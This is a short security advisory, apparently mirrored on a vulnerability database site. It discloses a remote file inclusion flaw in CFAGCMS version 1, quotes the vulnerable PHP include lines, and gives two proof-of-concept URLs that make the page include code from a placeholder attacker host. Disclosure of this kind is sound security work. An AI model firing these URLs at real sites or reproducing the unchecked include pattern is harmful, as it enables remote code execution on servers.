########################## www.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: CFAGCMS Remote File Inclusion
# Vendor: http://sourceforge.net/projects/cfagcms/
# Bug: Remote File Inclusion
# Vulnerable Version: 1
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_58.htm
###################################################################
####################
- Description:
####################
CFAGCMS is a gaming cms for gaming website like GameSpot, GameSpy and others. It's using php and mysql.
####################
- Vulnerability:
####################
+--> File Inclusion
When register_globals is enabled, Its possible to include arbitrary files from local or remote resources.
####################
- Code Snippet:
####################
themes/default/index.php #line:14-17
<div id="twocols" class="clearfix">
<div id="maincol" >maincol<?php include($main);?></div>
<div id="rightcol" >right col<?php include($right);?></div>
</div>
####################
- Exploits/POCs:
####################
POC: http://[URL]/cfagcms/themes/default/index.php?main=http://evilsite
POC: http://[URL]/cfagcms/themes/default/index.php?right=http://evilsite
####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation